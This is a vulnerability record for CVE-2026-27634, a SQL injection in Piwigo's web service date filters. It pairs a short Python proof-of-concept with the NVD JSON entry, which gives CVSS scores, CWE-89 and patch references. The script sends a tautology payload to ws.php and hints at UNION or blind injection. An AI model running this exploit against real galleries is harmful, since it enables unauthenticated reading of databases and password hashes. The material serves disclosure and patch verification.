CVE-2026-27634

import requests # Proof of Concept for CVE-2026-27634 # This script demonstrates the SQL injection vulnerability in Piwigo < 16.3.0 # The vulnerability exists in the date filter parameters of the web service API. def exploit_piwigo_sqli(target_url): """ Attempts to exploit the SQL injection vulnerability in Piwigo. """ # The vulnerable endpoint is typically the web service (ws.php) endpoint = f"{target_url}/ws.php" # SQL Injection payload: Using a simple logical check to demonstrate the vulnerability # This payload attempts to make the condition TRUE, potentially returning all records. # In a real scenario, this would be a UNION SELECT or blind injection payload. sqli_payload = "2024-01-01' OR '1'='1" parameters = { "method": "pwg.images.search", # Common method triggering the filter "f_min_date_available": sqli_payload, "format": "json" } try: print(f"[+] Sending payload to {endpoint}") response = requests.get(endpoint, params=parameters, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response content (first 500 chars):") print(response.text[:500]) # Analyze response to confirm vulnerability (heuristic) if "images" in response.text or "result" in response.text: print("[!] Potential SQL Injection confirmed based on response structure.") else: print("[!] Response received, but manual verification of data exfiltration is required.") else: print(f"[-] Server returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Replace with the actual target URL target = "http://localhost/piwigo" exploit_piwigo_sqli(target)

{"cve": {"id": "CVE-2026-27634", "sourceIdentifier": "[email protected]", "published": "2026-04-03T22:16:25.720", "lastModified": "2026-04-09T21:14:23.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Piwigo is an open source photo gallery application for the web. Prior to version 16.3.0, the four date filter parameters (f_min_date_available, f_max_date_available, f_min_date_created, f_max_date_created) in ws_std_image_sql_filter() are concatenated directly into SQL without any escaping or type validation. This could result in an unauthenticated attacker reading the full database, including user password hashes. This issue has been patched in version 16.3.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.3.0", "matchCriteriaId": "3502BA46-5475-47BC-BA8F-F9456A836F1A"}]}]}], "references": [{"url": "https://github.com/Piwigo/Piwigo/commit/0d5ed1f7778bbe263410446d8cf64594df75bd08", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Piwigo/Piwigo/security/advisories/GHSA-mgqc-3445-qghq", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://piwigo.org/release-16.3.0", "source": "[email protected]", "tags": ["Release Notes"]}]}}